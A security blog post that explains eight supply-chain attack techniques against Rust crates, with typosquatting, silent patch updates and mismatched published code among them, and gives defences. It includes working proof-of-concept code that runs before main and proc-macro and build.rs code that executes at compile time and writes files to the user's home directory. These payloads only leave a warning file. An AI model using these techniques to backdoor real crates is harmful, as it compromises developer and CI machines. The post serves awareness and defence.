
Backdooring Rust crates for fun and profit

Supply chain attacks are all the rage these days, whether to deliver RATs, cryptocurrency miners, or credential stealers.

In Rust, packages are called crates and are (most of the time) hosted on a central repository, crates.io, for better discoverability.

We are going to study 8 techniques to achieve Remote Code Execution (RCE) on developers', CI/CD, or users' machines. I deliberately ignored perniciously backdoored algorithms, such as weakened cryptographic primitives or obfuscated code, because that is a whole different topic.

The goal of this post is to raise awareness among developers about how easy it is to carry out these kinds of attacks and how pernicious they can be.

Of course, an attacker can combine these techniques to make them more effective and stealthy.

Interested in Security and Rust? Take a look at my book Black Hat Rust



Typosquatting

By naming a crate in a very similar way to a popular one, we can expect that a non-zero number of developers will make a typo in the name, either when searching on crates.io or when installing the crate.

As an example, I just published the crate num_cpu, which targets the num_cpus crate and its almost 43,000,000 downloads.
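The typo is easy to miss in a project's manifest; a hypothetical victim's Cargo.toml would differ from the intended one by a single character:

```toml
[dependencies]
# Intended dependency:
#   num_cpus = "1"
# What a hurried developer might actually type (the typosquatted crate):
num_cpu = "1"
```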

When you look at both crates on crates.io, it’s very hard to tell which one is legitimate and which one is malicious.

num_cpu on crates.io

Actually, my num_cpu crate has been downloaded 24 times in less than 24 hours, but I’m not sure whether by bots or real people (I didn’t embed any active payload, to avoid headaches for anyone involved).

How to know if a crate is legitimate or not?

It’s hard! You can look at the Owners section or the total number of downloads.

But still, this is not perfect: I could have made up my profile in order to look like a famous developer.

Misleading name

All crates on crates.io live under a global namespace: there is no organizational scoping.

Thus, organizations, projects, and developers rely on prefixes to make their packages discoverable and to group them: tokio-stream or actix-http, for example.

Problem: anyone can upload a package with a given prefix. For example, I just uploaded the crate tokio-backdoor. While it’s hard to have a more explicit name, imagine if I had named this crate tokio-workerpool or tokio-future.

By using misleading metadata such as the README, the repository, and tags, an attacker can make this crate appear like an official one.

How to detect these scams?

Again, it’s hard!

Transitive dependencies

By burying a backdoored crate deep in the dependency tree, an attacker can conceal it from scrutiny.

The chance that anyone reviews the code of all the transitive dependencies is approximately 0.

For example, let’s say I want to backdoor a popular crate. I can make a Pull Request adding a new dependency, let’s say tokio-helpers. The trick is that it’s not tokio-helpers that is backdoored: it’s a dependency of a dependency of a … of tokio-helpers.

“x.x.1” Update

By issuing an x.x.1 update, an attacker can compromise all the maintainers relying on cargo update to update their dependencies: from 1.12.0 to 1.12.1, or from 0.5.13 to 0.5.14, for example.

Due to how semantic versioning works, a maintainer relying on cargo update to keep their dependencies up to date is going to install the compromised version.
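Concretely, Cargo’s default version requirements are “caret” ranges, so a sketch of a vulnerable manifest (crate name illustrative) looks like this:

```toml
[dependencies]
# "1.12" is a caret requirement: it accepts any 1.x version >= 1.12.0,
# so `cargo update` will happily move the lockfile from 1.12.0 to a
# freshly published (and possibly malicious) 1.12.1.
tokio = "1.12"
```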

This technique does not necessarily require the cooperation of the crate’s author: an attacker only needs a publish token, which could have been stolen in a previous compromise.

How to protect?

By pinning an exact version of a dependency, tokio = "=1.0.0" for example; but then you no longer automatically receive bug fixes.
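In Cargo.toml, that pin looks like the following (a sketch, with tokio standing in for any dependency):

```toml
[dependencies]
# `=` pins the exact version: `cargo update` won't move past it,
# which blocks silent x.x.1 updates but also silently skips bug fixes.
tokio = "=1.0.0"
```

Committing Cargo.lock and building with `cargo build --locked` in CI gives a similar guarantee without hard-pinning every dependency.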

Malicious update

A variant of the previous technique is to use the --allow-dirty flag of the cargo publish command.

By doing so, in conjunction with an x.x.1 update for example, an attacker can publish a crate on crates.io without having to commit the code to a public repository.

Where it becomes vicious is that it’s totally possible to make Git tags and versions match while the code differs! There is absolutely no guarantee that the code on crates.io matches the code on GitHub, even if the tags and version numbers match!

How to protect?

One method of protection is to vendor your dependencies (with cargo vendor) and carefully audit the diffs on each update.
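A minimal vendoring setup, assuming the standard workflow: run `cargo vendor`, commit the generated `vendor/` directory, and point Cargo at it in `.cargo/config.toml` (this is the snippet `cargo vendor` itself prints):

```toml
# .cargo/config.toml — redirect all crates.io sources to the local
# vendor/ directory, so every dependency update shows up as a
# reviewable diff in version control.
[source.crates-io]
replace-with = "vendored-sources"

[source.vendored-sources]
directory = "vendor"
```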

Run code before main

One of the principles of Rust is “no life before main”, yet it’s still possible to run code before main by abusing how executables work.

Put another way, it’s possible to run code without ever calling it.

It can be done by using the .init_array section on Linux or FreeBSD, the __DATA,__mod_init_func section on macOS / iOS, the .ctors section on other Unixes (and windows-gnu), and the .CRT$XCU section on Windows (MSVC).

Here is an example extracted from the startup crate:

macro_rules! on_startup {
    ($($tokens:tt)*) => {
        const _: () = {
            // pulled out and scoped to be unable to see the other defs because
            // of the issues around item-level hygene.
            extern "C" fn __init_function() {
                // Note: currently pointless, since even when loaded at runtime
                // via dlopen, panicing before main makes the stdlib abort.
                // However, if that ever changes in the future, we want to guard
                // against unwinding over an `extern "C"` boundary, so we force
                // a double-panic, which will trigger an abort (rather than have
                // any UB).
                let _guard = $crate::_private::PanicOnDrop;
                // Note: ensure we still forget the guard even if `$tokens` has
                // an explicit `return` in it somewhere.
                let _ = (|| -> () { $($tokens)* })();
                $crate::_private::forget(_guard);
            }
            #[used]
            #[cfg_attr(
                any(target_os = "macos", target_os = "ios", target_os = "tvos"),
                link_section = "__DATA,__mod_init_func"
            )]
            // These definitely support .init_array
            #[cfg_attr(
                any(
                    target_os = "linux",
                    target_os = "android",
                    target_os = "freebsd",
                    target_os = "netbsd",
                ),
                link_section = ".init_array"
            )]
            // Assume all other unixs support .ctors
            #[cfg_attr(all(
                any(unix, all(target_os = "windows", target_env = "gnu")),
                not(any(
                    target_os = "macos", target_os = "ios",
                    target_os = "tvos", target_os = "linux",
                    target_os = "android", target_os = "freebsd",
                    target_os = "netbsd",
                ))
            ), link_section = ".ctors")]
            #[cfg_attr(all(windows, not(target_env = "gnu")), link_section = ".CRT$XCU")]
            static __CTOR: extern "C" fn() = __init_function;
        };
    };
}

Then, we can backdoor a crate like this:

pub fn do_something() {
    println!("do something...");
}

startup::on_startup! {
    println!("Warning! You just ran a malicious package. Please read for more information.");
}

Any crate using the backdoored crate is compromised, even if it’s a dependency of a dependency of a …:

fn main() {
    // `backdoored_crate` is the (hypothetical) crate defined above.
    backdoored_crate::do_something();
}
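The trick can be reduced to a tiny self-contained sketch (the names `RAN_EARLY`, `EARLY_INIT`, and `ran_early` are mine): a function pointer placed in the platform’s constructor section is invoked by the loader before `main` is ever reached.

```rust
use std::sync::atomic::{AtomicBool, Ordering};

// Flag flipped by our "life before main" constructor.
static RAN_EARLY: AtomicBool = AtomicBool::new(false);

// Place a function pointer in the platform's constructor section so the
// loader calls it before any user code runs. #[used] prevents the
// linker from discarding the static.
#[used]
#[cfg_attr(
    any(target_os = "linux", target_os = "android", target_os = "freebsd"),
    link_section = ".init_array"
)]
#[cfg_attr(
    any(target_os = "macos", target_os = "ios"),
    link_section = "__DATA,__mod_init_func"
)]
#[cfg_attr(all(windows, not(target_env = "gnu")), link_section = ".CRT$XCU")]
static EARLY_INIT: extern "C" fn() = {
    extern "C" fn early_init() {
        // An attacker would run a payload here; we only set a flag.
        RAN_EARLY.store(true, Ordering::SeqCst);
    }
    early_init
};

pub fn ran_early() -> bool {
    RAN_EARLY.load(Ordering::SeqCst)
}
```

Here the “payload” only flips a flag, but the constructor could just as well spawn a process or exfiltrate files, all before the first line of `main`.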

Malicious macros

Rust macros are code that runs at compile time, or even at cargo check time. Can they be abused?

It turns out that yes! The ability to run code at compile time means that any of your dependencies can download malware or exfiltrate files from your computer.

This risk is amplified by the fact that rust-analyzer also expands macros when loading a project: a machine can thus be compromised just by opening, with a code editor (with the rust-analyzer plugin), the folder of a crate with a backdoored dependency.

Whether it be a direct or an indirect dependency!
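One partial mitigation, assuming a recent rust-analyzer: disable proc-macro expansion and build-script execution in your editor settings before opening untrusted projects (setting names have varied across versions):

```json
{
  "rust-analyzer.procMacro.enable": false,
  "rust-analyzer.cargo.buildScripts.enable": false
}
```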

These attacks are particularly juicy for attackers because developers' and CI/CD machines (the targets of these attacks) often hold credentials that can be used to pivot or spread more malware.

Here are two examples of malicious macros.

First, a derive macro:

use proc_macro::TokenStream;
use std::path::Path;

fn write_warning(file: &str) {
    let home = std::env::var("HOME").unwrap();
    let home = Path::new(&home);
    let warning_file = home.join(file);

    let message = "Warning! You just ran a malicious package. Please read for more information.";
    let _ = std::fs::write(warning_file, message);
}

#[proc_macro_derive(Evil)]
pub fn evil_derive(_item: TokenStream) -> TokenStream {
    write_warning("WARNING_DERIVE");

    // Expand to nothing, so nobody notices anything.
    "".parse().unwrap()
}


Which, once used by a crate, is enough to compromise it and all its dependents:

use malicious_macro::Evil;

#[derive(Evil)]
pub struct RandomStruct {}

Then, a function-like procedural macro:

#[proc_macro]
pub fn evil(_item: TokenStream) -> TokenStream {
    write_warning("WARNING_MACRO");

    "".parse().unwrap()
}


Again, if any of your (transitive or not) dependencies call this macro, it’s enough for a compromise at compile-time.

pub fn do_something() {
    println!("do something...");
}

malicious_macro::evil!();

And in a dependent crate:

fn main() {
    // `backdoored_crate` is the (hypothetical) crate defined above.
    backdoored_crate::do_something();
}


build.rs

Like malicious macros, a crate’s build.rs build script is run by cargo check and rust-analyzer. Thus, opening with a code editor the folder of a crate with a backdoored (direct or transitive) dependency is enough to compromise a machine.

While it’s possible to audit the code of a crate on docs.rs by clicking on a [src] button, it turns out that I couldn’t find a way to inspect build.rs files. Thus, combined with a malicious update, it’s the almost perfect backdoor.

Update: it’s actually possible to inspect build.rs files on docs.rs by using the source view: https://docs.rs/crate/[CRATE]/[VERSION]/source/. Thanks Joshua 🙏

use std::path::Path;

fn main() {
    let home = std::env::var("HOME").unwrap();
    let home = Path::new(&home);
    let warning_file = home.join("WARNING_BUILD");

    let message = "Warning! You just ran a malicious package. Please read for more information.";
    let _ = std::fs::write(warning_file, message);
}

This technique is less stealthy than malicious macros, as build.rs files are displayed during the compilation process.

Some Closing Thoughts

As Rust is designed for sensitive applications where reliability is important, such as embedded, networking, or blockchain projects, these risks are all the more concerning.

Also, while favoring small and reusable software packages may be philosophically appealing, it has serious practical implications.

Finally, let’s be honest, who has the resources to carefully audit each one of their dependencies (including the transitive ones), for each update?

I see 3 main axes to reduce the impact and the risks associated with these kinds of attacks.

Firstly, a bigger standard library would reduce the need for external dependencies and thus reduce the risk of compromise.

Secondly, Rust supports Git dependencies. Using a Git dependency pinned to a specific commit can prevent some of the techniques mentioned above.
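In Cargo.toml, such a pin looks like this (crate name illustrative, and the `rev` value is a placeholder for a full commit hash):

```toml
[dependencies]
# Pinning to a commit hash means neither a new tag nor a force-push
# can silently change what you build.
tokio = { git = "https://github.com/tokio-rs/tokio", rev = "<full-commit-sha>" }
```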

Thirdly, using cloud developer environments such as GitHub Codespaces or Gitpod. By working in sandboxed environments for each project, one can significantly reduce the impact of a compromise.

The code is on GitHub

As usual, you can find the code on GitHub: (please don’t forget to star the repo 🙏).

1 email / week to learn how to (ab)use technology for fun & profit: Programming, Hacking & Entrepreneurship.
I hate spam even more than you do. I'll never share your email, and you can unsubscribe at any time.

Tags: hacking, security, programming, rust, tutorial

Want to learn Rust and offensive security? Take a look at my book Black Hat Rust. All early-access supporters get a special discount and awesome bonuses:
Warning: this offer is limited in time!
